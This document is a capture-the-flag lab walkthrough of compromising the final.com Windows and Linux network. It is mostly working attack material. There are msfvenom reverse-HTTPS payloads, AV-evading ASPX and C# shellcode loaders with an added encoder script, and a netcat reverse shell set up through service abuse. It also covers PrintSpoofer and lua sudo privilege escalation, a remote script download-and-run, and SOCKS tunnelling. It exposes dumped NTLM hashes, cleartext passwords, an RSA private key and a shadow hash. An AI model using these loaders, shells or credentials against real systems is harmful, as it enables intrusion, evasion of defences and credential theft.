Challenge 6

172.16.X.180
172.16.X.183
172.16.X.184
172.16.X.187
172.16.X.188
172.16.X.192
172.16.X.194
172.16.X.197
192.168.x.181
192.168.x.189

192.168.x.181
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Home Page - Final Application
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: WEB05
| DNS_Domain_Name: final.com
| DNS_Computer_Name: web05.final.com
| DNS_Tree_Name: final.com
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-16T13:35:05+00:00
| ssl-cert: Subject: commonName=web05.final.com
| Not valid before: 2020-10-26T12:28:25
|_Not valid after: 2021-04-27T12:28:25
|_ssl-date: 2021-02-16T13:35:07+00:00; -54s from scanner time.
9090/tcp open zeus-admin?
| fingerprint-strings:
| JavaRMI, LANDesk-RC, NULL:
|_ This is Zen HelpDesk, please perform the required authentication
1 service unrecognized despite returning data. If you know the service/ver

192.168.x.189
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FIREWALL02
| NetBIOS_Domain_Name: FIREWALL02
| NetBIOS_Computer_Name: FIREWALL02
| DNS_Domain_Name: firewall02
| DNS_Computer_Name: firewall02
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-16T13:40:25+00:00
| ssl-cert: Subject: commonName=firewall02
| Not valid before: 2020-10-25T21:26:20
|_Not valid after: 2021-04-26T21:26:20
|_ssl-date: 2021-02-16T13:41:05+00:00; -6s from scanner time.
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


|_clock-skew: mean: -6s, deviation: 0s, median: -6s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-16T13:40:27
|_ start_date: N/A
The web application on WEB05 lets us upload aspx files; browsing to the uploaded file makes IIS compile and run it as the application pool identity, so we reuse the same aspx loader approach as in challenge #2:


msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.X.Y LPORT=443 -f aspx -o 3.aspx

Then I open the aspx and add a simple Caesar shift to the shellcode (an encoding step to break static signatures, not real encryption). First the helper that shifts every byte by +5 and prints the result as a C# array literal:

using System;
using System.Text;

namespace CaesarEncrypt
{
    class Program
    {
        static void Main(string[] args)
        {
            // Paste the raw msfvenom shellcode here (685 bytes in this run)
            byte[] buf = new byte[685] { shellcodeHere };

            byte[] encoded = new byte[buf.Length];

            // Shift each byte by +5; the & 0xFF wraps values above 255
            for (int i = 0; i < buf.Length; i++)
            {
                encoded[i] = (byte)(((uint)buf[i] + 5) & 0xFF);
            }

            // Emit "0x.., 0x.., ..." so it can be pasted straight into the aspx loader
            StringBuilder hex = new StringBuilder(encoded.Length * 2);
            foreach (byte b in encoded)
            {
                hex.AppendFormat("0x{0:x2}, ", b);
            }
            Console.WriteLine("The payload is: " + hex.ToString());
        }
    }
}

Then in 3.aspx, I modify it to this (the VirtualAllocExNuma call is a sandbox check, and the shift is undone in memory right before execution):

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
    private static Int32 MEM_COMMIT = 0x1000;
    private static IntPtr PAGE_EXECUTE_READWRITE = (IntPtr)0x40;

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);

    [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

    [System.Runtime.InteropServices.DllImport("kernel32.dll")]
    private static extern IntPtr GetCurrentProcess();

    protected void Page_Load(object sender, EventArgs e)
    {
        // Sandbox check: many AV emulators do not implement VirtualAllocExNuma
        // and return NULL. IntPtr is a struct, so the comparison must be against
        // IntPtr.Zero; "mem == null" is always false and never fires.
        IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
        if (mem == IntPtr.Zero)
        {
            return;
        }

        // Caesar-shifted shellcode produced by the helper above
        byte[] oe7hnH0 = new byte[685] { shellcodeHere };

        // Undo the +5 shift in memory just before execution
        for (int i = 0; i < oe7hnH0.Length; i++)
        {
            oe7hnH0[i] = (byte)(((uint)oe7hnH0[i] - 5) & 0xFF);
        }

        IntPtr uKVv = VirtualAlloc(IntPtr.Zero, (UIntPtr)oe7hnH0.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        System.Runtime.InteropServices.Marshal.Copy(oe7hnH0, 0, uKVv, oe7hnH0.Length);
        IntPtr xE34tIARlB = IntPtr.Zero;
        IntPtr iwuox = CreateThread(IntPtr.Zero, UIntPtr.Zero, uKVv, IntPtr.Zero, 0, ref xE34tIARlB);
    }
</script>

meterpreter > getuid


Server username: IIS APPPOOL\DefaultAppPool
meterpreter > sysinfo
Computer : WEB05
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : FINAL
Logged On Users : 9
Meterpreter : x64/windows

SeImpersonatePrivilege Impersonate a client after authentication Enabled

SeImpersonatePrivilege is enabled for the app pool identity, so let's escalate with a named-pipe impersonation attack (PrintSpoofer / SpoolSample):

c:\inetpub>more local.txt
more local.txt
09b72e94ac6c57f4171aab83f205e320

To generate the encrypted shellcode with XOR, I do:


msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.X.Y LPORT=443 -f raw -o rulon.bin
root@kali:~/Ogimmeshellec/Lab# python xorenrypt.py rulon.bin
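The page never shows xorenrypt.py, and the Caesar step above was done in a throwaway C# project. The script below is an added example (not the page's own tool) that covers both: it applies either the +5 Caesar shift expected by the aspx loader or the repeating-key XOR with the key hard-coded in gimmeshell, checks the transform is invertible, and prints a C# byte[] literal. The command-line shape, the output format and the sample bytes are assumptions.

```python
"""Shellcode encoders for the two loaders on this page (added example)."""
import sys

CAESAR_SHIFT = 5
# Same key string as the gimmeshell loader on the page
XOR_KEY = b"a70f8922029506d2e37f375fd638cdf9e2c039c8a1e6e01189eeb4efb"

# Constructed sample bytes (a typical x64 stager prologue); used when the
# script is run with "sample" instead of a .bin file.
SAMPLE = bytes([0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xff, 0xfe])


def caesar_encode(data: bytes, shift: int = CAESAR_SHIFT) -> bytes:
    """Add `shift` to each byte, wrapping at 256; the aspx loader subtracts it back."""
    return bytes((b + shift) & 0xFF for b in data)


def caesar_decode(data: bytes, shift: int = CAESAR_SHIFT) -> bytes:
    """Inverse of caesar_encode, mirroring the loop in the aspx Page_Load."""
    return bytes((b - shift) & 0xFF for b in data)


def xor_encode(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR, identical to gimmeshell's xor(); applying it twice restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def to_csharp_array(data: bytes, name: str = "buf", per_line: int = 16) -> str:
    """Render bytes as a C# array literal ready to paste into the loader source."""
    rows = []
    for off in range(0, len(data), per_line):
        rows.append("    " + ", ".join(f"0x{b:02x}" for b in data[off:off + per_line]))
    return f"byte[] {name} = new byte[{len(data)}] {{\n" + ",\n".join(rows) + "\n};"


def main(argv):
    if len(argv) != 3 or argv[1] not in ("caesar", "xor"):
        print(f"usage: {argv[0]} caesar|xor shellcode.bin|sample", file=sys.stderr)
        return 2
    if argv[2] == "sample":
        raw = SAMPLE
    else:
        with open(argv[2], "rb") as fh:
            raw = fh.read()
    enc = caesar_encode(raw) if argv[1] == "caesar" else xor_encode(raw)
    # Round-trip check before printing: a wrong shift or key fails here,
    # not as a crash on the target.
    back = caesar_decode(enc) if argv[1] == "caesar" else xor_encode(enc)
    assert back == raw, "encoder is not invertible"
    print(to_csharp_array(enc))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 encode.py xor rulon.bin` and paste the printed array where the loader has `{ encryptedShellcode }`; the decode loop in the loader must use exactly the same key or shift.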

Then compile the gimmeshell.exe project on the Windows private VM, which contains this code:

using System;
using System.Text;
using System.Runtime.InteropServices;

namespace gimmeshell
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
        [DllImport("kernel32.dll")]
        static extern void Sleep(uint dwMilliseconds);

        // Repeating-key XOR; running it twice with the same key restores the plaintext
        private static byte[] xor(byte[] cipher, byte[] key)
        {
            byte[] xored = new byte[cipher.Length];
            for (int i = 0; i < cipher.Length; i++)
            {
                xored[i] = (byte)(cipher[i] ^ key[i % key.Length]);
            }
            return xored;
        }

        static void Main(string[] args)
        {
            // Sandbox check: emulators that fast-forward Sleep() return far too early
            DateTime t1 = DateTime.Now;
            Sleep(4000);
            double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
            if (t2 < 1.5)
            {
                return;
            }

            // Same key used by xorenrypt.py when rulon.bin was encoded
            string key = "a70f8922029506d2e37f375fd638cdf9e2c039c8a1e6e01189eeb4efb";
            byte[] xorbuf = { encryptedShellcode };
            byte[] buf = xor(xorbuf, Encoding.ASCII.GetBytes(key));
            int size = buf.Length;

            // MEM_COMMIT | MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40).
            // Allocate the real payload size instead of a fixed 0x1000 so a larger
            // stager cannot overrun the buffer.
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x3000, 0x40);
            Marshal.Copy(buf, 0, addr, size);
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}

Then drop it as rulon.exe in c:\windows\tasks.

Then compile the PrintSpoofer privesc from the PDF (PrintRulon.exe): it creates a named pipe, waits for the spooler to connect to it, impersonates the SYSTEM token and launches rulon.exe.


Then run the below commands

dir c:\windows\tasks

Directory: C:\windows\tasks

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a---- 2/16/2021 6:03 AM 6144 rulon.exe
-a---- 2/16/2021 6:04 AM 7680 PrintRulon.exe
-a---- 2/16/2021 6:09 AM 158720 SpoolSample.exe

PS C:\windows\system32\inetsrv> c:\windows\tasks\PrintRulon.exe \\.\pipe\test\pipe\spoolss


c:\windows\tasks\PrintRulon.exe \\.\pipe\test\pipe\spoolss
^Z
Background channel 1? [y/N] y
meterpreter > shell
Process 2300 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>c:\windows\tasks\SpoolSample.exe web05 web05/pipe/test


c:\windows\tasks\SpoolSample.exe web05 web05/pipe/test
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function

c:\windows\system32\inetsrv>^Z
Background channel 2? [y/N] y
meterpreter > channel -i 1
Interacting with channel 1...

Found sid S-1-5-18


Impersonated user is: NT AUTHORITY\SYSTEM
PS C:\windows\system32\inetsrv>
[*] https://192.168.X.Y:443 handling request from 192.168.x.181; (UUID: fvhay8aw) Staging x64 payload (202329 bytes) ...
[*] Meterpreter session 3 opened (192.168.X.Y:443 -> 192.168.x.181:49785) at 2021-02-16 15:12:07 +0100

3 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WEB05 192.168.X.Y:443 -> 192.168.x.181:49785 (192.168.x.181)

Then we are system!

more c:\users\administrator\Desktop\proof.txt
89f4c005905e38f0b2da8699845c2c7d

Secret : _SC_Service1 / service 'Service1' with username : adminWebSvc@final.com
cur/text: FGjksdff89sdfj

RID : 000001f4 (500)


User : Administrator
LM :
NTLM : 9689cee5c72d2ef437de593af89bb4ff

* Username : adminWebSvc
* Domain : FINAL
* NTLM : b0df1cb0819ca0b7d476d4c868175b94

* Username : WEB05$
* Domain : FINAL
* NTLM : ad2a0eacfd4c546f92b56018547a68dd

vi7&QE

.\SharpHound.exe --CollectionMethod All --Domain final.com

BloodHound shows that the user adminWebSvc@final.com is a member of a group whose members have the capability to change the user nina@final.com's password without knowing that user's current password (a ForceChangePassword edge). With the adminWebSvc cleartext password from the LSA secrets, we reset nina's password with PowerView:

$credsrulon = New-Object System.Management.Automation.PSCredential ("final.com\adminWebSvc", (ConvertTo-SecureString "FGjksdff89sdfj" -AsPlainText -Force))
$UserPassword = ConvertTo-SecureString 'PasswordRulon123!' -AsPlainText -Force
Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword -Credential $credsrulon -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'nina'
VERBOSE: [Set-DomainUserPassword] Password for user 'nina' successfully reset

Get-DomainComputer -Properties DnsHostName

dnshostname
-----------
dc01.final.com
sql03.final.com
sql11.final.com
web05.final.com
jump03.final.com
ansible06

172.16.X.180 - dc01.final.com
172.16.X.187 - sql03.final.com
172.16.X.188 - sql11.final.com
172.16.X.183 - jump03.final.com
172.16.X.184 - ansible06
172.16.X.192 - dc02.dev.final.com
172.16.X.194 - web06.dev.final.com
172.16.X.197 - appserver05.dev.final.com

Then we portscan them:


Invoke-Portscan -Hosts 172.16.X.184 -Ports "21,22,23,53,69,71,80,88,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,5985,5986,6667,6868,7777,7878,8000,8080,1521,3306,3389,5801,5900,5555,5901" | Select -ExpandProperty openPorts

172.16.X.180 - dc01.final.com
53
88
139
389
445
5985
3389

172.16.X.187 - sql03.final.com
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL03
| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql03.final.com
| DNS_Tree_Name: final.com
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-19T06:37:50
| Not valid after: 2051-02-19T06:37:50
| MD5: fefa d01e f133 358e 0ca5 53a9 2875 3260
|_SHA-1: e44e 17aa 67b7 ceaa 3301 dcd8 82ad 19c1 144e b73d
|_ssl-date: 2021-02-19T12:41:52+00:00; -47s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=sql03.final.com
| Issuer: commonName=sql03.final.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-10-26T11:06:48
| Not valid after: 2021-04-27T11:06:48
| MD5: 47f4 a744 ca7a ea72 860a 67bb 285d 5843
|_SHA-1: 9650 1b2b 48d8 4029 956a e83f 32f4 d5e0 7a73 1ccd
|_ssl-date: 2021-02-19T12:41:52+00:00; -47s from scanner time.
MAC Address: 00:50:56:86:A0:9C (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


|_clock-skew: mean: -47s, deviation: 0s, median: -47s
| ms-sql-info:
| 172.16.X.187:1433:
| Version:
| name: Microsoft SQL Server
| number: 15.00.2000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
|_p2p-conficker: ERROR: Script execution failed (use -d to debug)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-19T12:41:45
|_ start_date: N/A

172.16.X.188 - sql11.final.com
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql11.final.com
| DNS_Tree_Name: final.com
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-02-18T07:40:16
|_Not valid after: 2051-02-18T07:40:16
|_ssl-date: 2021-02-18T10:28:44+00:00; -18s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=sql11.final.com
| Not valid before: 2020-10-26T11:07:15
|_Not valid after: 2021-04-27T11:07:15
|_ssl-date: 2021-02-18T10:28:44+00:00; -18s from scanner time.
5985/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:50:56:86:A8:60 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


|_clock-skew: mean: -18s, deviation: 0s, median: -18s
| ms-sql-info:
| 172.16.X.188:1433:
| Version:
| name: Microsoft SQL Server
| number: 15.00.2000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
|_p2p-conficker: ERROR: Script execution failed (use -d to debug)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-18T10:28:38
|_ start_date: N/A

172.16.X.184 - ansible06
22

172.16.X.194 - web06.dev.final.com
80/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.2.34)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
|_http-title: Final Web Store
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=web06.dev.final.com
| Not valid before: 2020-10-26T11:34:37
|_Not valid after: 2021-04-27T11:34:37
|_ssl-date: 2021-02-18T09:24:21+00:00; -1s from scanner time.
5985/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.2.34)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
|_http-title: Final CMS App
MAC Address: 00:50:56:86:EE:82 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


|_p2p-conficker: ERROR: Script execution failed (use -d to debug)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-18T09:24:11
|_ start_date: N/A

172.16.X.197
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)

Then we setup socks4a and autoroute through meterpreter by doing:


PS C:\Users> ^Z
Background channel 2? [y/N] y

meterpreter > run autoroute -s 172.16.X.0/24


[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.X.0/255.255.255.0...
[+] Added route to 172.16.X.0/255.255.255.0 via 192.168.x.181
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf5 auxiliary(server/socks4a) > run -j
[*] Auxiliary module running as background job 1.
[*] Starting the socks4a proxy server

Then, to confirm that proxychains works through the SOCKS proxy, I log in as administrator on web05 with the NTLM hash dumped earlier:

proxychains python3 /opt/Windows/Impacket/examples/psexec.py -hashes :9689cee5c72d2ef437de593af89bb4ff [email protected]

Tommy is a user on the Linux machine; his group membership:

memberof : {CN=LinuxUsers,OU=FinalGroups,DC=final,DC=com, CN=MgtUsers,OU=FinalGroups,DC=final,DC=com}

Then I run BloodHound collection with the new credentials, once per domain:

.\SharpHound.exe --CollectionMethod All,GPOLocalGroup,LoggedOn --domain dev.final.com --ldapusername nina --ldappassword 'PasswordRulon123!'

.\SharpHound.exe --CollectionMethod All,GPOLocalGroup,LoggedOn --domain final.com --ldapusername nina --ldappassword 'PasswordRulon123!'

Then we see in BloodHound:

The members of the group MGTUSERS@FINAL.COM have the capability to create a Remote Desktop Connection with the computer JUMP03.FINAL.COM.

Nina is a member of MgtUsers, so let's RDP to jump03 - 172.16.X.183 with her new password:

hostname
jump03
whoami
final\nina

more local.txt
911430e89bd98320be4673732818eaa0

On jump03, PowerUp's service check finds a service that nina can reconfigure:

[*] Found 1 result(s).

Name : SNMPTRAP
ImagePath : C:\Windows\System32\snmptrap.exe
User : NT AUTHORITY\LocalService
Status : Stopped
UserCanStart : True
UserCanRestart : True
To get my shell back, I do:

msfconsole -x 'use auxiliary/server/socks4a; set SRVPORT 1080; set SRVHOST 127.0.0.1; run -j; use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 192.168.X.Y; set LPORT 443; set EXITONSESSION false; set AutoRunScript "autoroute -s 172.16.X.0/24"; run'

Upload 3.aspx again, then I can connect to web05 through the proxy:

proxychains python3 /opt/Windows/Impacket/examples/psexec.py -hashes :9689cee5c72d2ef437de593af89bb4ff [email protected]

Then I find web06.final.com by enumerating with Get-DomainUser from jump03.

So let’s portscan it:


IEX(New-Object Net.webclient).downloadString('http://192.168.X.Y/Invoke-Portscan.ps1')
Invoke-Portscan -Hosts 172.16.X.194 -Ports "21,22,23,53,69,71,80,88,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,5985,5986,6667,6868,7777,7878,8000,8080,1521,3306,3389,5801,5900,5555,5901" | Select -ExpandProperty openPorts
80
445
5985
8080
3389

Then we can reach web06.dev.final.com through proxychains.

On port 8080 we have:

http://172.16.X.194:8080/

This is the CMS development app.

Diana is in CN=Domain Admins,CN=Users,DC=dev,DC=final,DC=com, so she is a domain admin on dev.final.com.

C:\Users\nina>sc config SNMPTRAP obj= "NT AUTHORITY\SYSTEM" password= ""


[SC] ChangeServiceConfig SUCCESS

C:\Users\nina>sc config snmptrap binpath= "c:\users\nina\nc64.exe 192.168.X.Y 80 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\Users\nina>sc qc snmptrap
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: snmptrap
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\users\nina\nc64.exe 192.168.X.Y 80 -e cmd.exe
LOAD_ORDER_GROUP :
TAG :0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\SYSTEM
Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'

ServiceAbused Command
------------- -------
SNMPTRAP net user john Password123! /add && net localgroup Administrators john /add

net users

User accounts for \\JUMP03

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
john WDAGUtilityAccount
The command completed successfully.

So it worked! John is now admin, and we can now RDP to jump03 and grab proof.txt:

89f4c005905e38f0b2da8699845c2c7d

Then we get tommy’s id_rsa:


more id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEApDD/vFcPlFAHQyy/3ZDJwlm1X3mgeEUoAr5PfxJzX/TRf2A+
AYlQOgZxBaoOC9CTwJ+7jSkJvjAUq7P5IDZFcLb+hEXUt8DxG37+zm8AwmRLVysF
S/qMRgznQ2JnvuvbhTam6YowbcgQXcCx+a6wAhL/4o4/STwg0Xbm9Hek7sevbWqa
vLLikbh4Z6JQ0hEVudT20gwkY5nOeDnXB0A8yhTJvBXQB/LYgflAAclX/jwpa6h7
MZe2fSdPpkIWJoDLgVkVg5j5EsAn8mZdf6EvPWYAy3DHpOC8UUwYaNdszrCg+0Rg
KxyoVikHk7m6ib4z9E8SxoUOXVMfnw6NWLzZqwIDAQABAoIBAQCPNPGJCwJaoKaE
7531GVjwe6AXQxU0cVUhd24M7kHVOsoS6BWM74Aa7A1eHGGd6nFEe81wpI+L45HT
5OhwMQXF9sXtBp8vGkjxa4XA9c5avnF7+Njo2QHKA20eN9E3E65m9TEF1vLAfdPQ
gcZ5eOSpGns21kzaimgxahyss0IWxIvAY/dSs4dbP+/7NZPQjnw7lpEPsMlmFfFn
xTljuhqWfeZHEdqH+A8Qx7Hflema4MYZ4labOzWUm2oXTbNpK7CiElnmTvWIOdiv
nesJtH+zhzxn6ydmvQlP/mtFYsNFhTuVjJ4Grzb70flI/IJztn7xnnJQhfLnZ/Yg
++58j91JAoGBANk120uDbGgQN3tvuXEklyXvf6jF1wISF8EAWVEa90Cl8wAkyvL8
N7gKAvSR7CKpuKOxPRqUw0UoMG5fPOapy0B0l7ipm15/d+ybdrEiOS/2MLyWG3aX
wMBAPvwCU2HrplxoW65ALeVhfyS0EiI5qfgfl7XJeywRMyUbjc4lRTYNAoGBAMGD
ShJqQz2CNcz+QyOuBXe8vdvdfNqF20k8dh7QGopo0n2ktazDWHWJEkKuGpYc9tmv
ZnG8dDQQ1hWv36gCv4EgWWNej8kKLFuGalfVWV9wBYnc602BNS1SZjvDyn354hFT
k5TeSLlnGtueWDAU9SLRSvo7P9XiuOEaO9HHy9iXAoGBAJfPGFGSrPWeP+i5kTYO
iMUuul5Ox5Le6lMt1z7kReKdGVUEYgOpW5f5B0+/nPYtAKsHeNlXF5MCH7dEQOBF
05Rc6J1bjQdit4JatX3fmXB39GAZ2V/td/3l6R9g0L4jYMY8+bazjGBA4AfbAsGA
49ZS3kljY/7Mlp5cv6NQUSsRAoGAemJ2Lj9WV0hKjmMgQyiD/L45tRvXIr0VerPq
YIJsxqyUszHAVIsXHv6ZteI2nkmjNPlhaP0u4N7lBsI8SR2z0A6NefMMLLFqbFgO
WY5s/5bxacd2aYYWA5vhXFrvbczj1OFurPAIPnme2tbCH2ahwmtrZ+ag8Lx7AKJ+
wqYBnfECgYEA0wv11GTujeaG7QS9c5nVPKAMQfNTSbHlrg57Y4VBS4h9V0ZkbODU
a3g2uuwhOwmRs07O7S6p8rDy/oJaP0OoOdNbVEkix8jcoa3nGyyFOKaHkYMtiISJ
kHLEnxkYRBvBUSHkOukFmx93fwH2Z13FL9IRQ0Tf6BqeQAWa62QEXRc=
-----END RSA PRIVATE KEY-----

* Username : tommy
* Domain : FINAL
* NTLM : 5ad27ee8000951e0669fab25f73f9d8a
* Username : Administrator
* Domain : JUMP03
* NTLM : 935a2a886200d2bf5040b1344b2d33d7

* Username : tommy
* Domain : FINAL.COM
* Password : 89dsfsji43A

[NL$2 - 11/28/2020 12:39:13 PM]


RID : 00000458 (1112)
User : FINAL\tommy
MsCacheV2 : 3250e1e50bbaf0a3ac53bedf130c692f

[NL$3 - 11/2/2020 12:58:05 PM]


RID : 000001f4 (500)
User : FINAL\Administrator
MsCacheV2 : c455fba4c33031e45641639cc46cc25a

proxychains python3 psexec.py -hashes :935a2a886200d2bf5040b1344b2d33d7 [email protected]

Then we can ssh to ansible:


proxychains ssh -i tommy_rsa final\\tommy@172.16.X.184
tommy@final.com@ansible06:~$ cat local.txt
320cadccfa931d8444d263fd38352908

tommy@final.com@ansible06:/$ sudo -l
Matching Defaults entries for tommy@final.com on ansible06:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tommy@final.com may run the following commands on ansible06:


(ALL) NOPASSWD: /usr/bin/lua

sudo /usr/bin/lua -e 'os.execute("/bin/sh")'

So then we are root

# cat proof.txt
475e008585daee29fbc9d0fc4a5f4491

ansiblesvc:$6$ZLO9O2l.NR91p0ZL$ASnOBAvHtvZOi1HUhHfvE5XkIQhSdXLwWNzEysD3cqyBBL40/JJwB2MZtZwMKAwnYxwR4qwNvjVhW.TX.MwA00:18562:0:99999:7:::

In .bash_history of user ansiblesvc, we find:


ssh-copy-id [email protected]
ping appserver05.dev.final.com
ssh-copy-id [email protected]

So here is another machine I haven’t seen earlier, which has IP 172.16.X.197

If we check /etc/ansible/hosts, we have:


[appservers]
appserver05.dev.final.com

Then let's upload nmap and port scan the IPs found earlier.

root@ansible06:/home# su - ansiblesvc
ansiblesvc@ansible06:~$ ansible appservers -a "whoami"
appserver05.dev.final.com | CHANGED | rc=0 >>
ansiblesvc

So we can execute commands on appservers when we are using ansiblesvc.

To set up a more stable proxy from jump03, I run a chisel server on Kali and a reverse SOCKS client on jump03:

/opt/Linux/chisel server -p 5989 --reverse --socks5
.\chisel64.exe client -v 192.168.X.Y:5989 R:1080:socks

Then from ansible06, using the key that ssh-copy-id pushed there, I can get a shell on appserver05:

ssh ansiblesvc@appserver05.dev.final.com

ansiblesvc@appserver05:~$ sudo -l
Matching Defaults entries for ansiblesvc on appserver05:
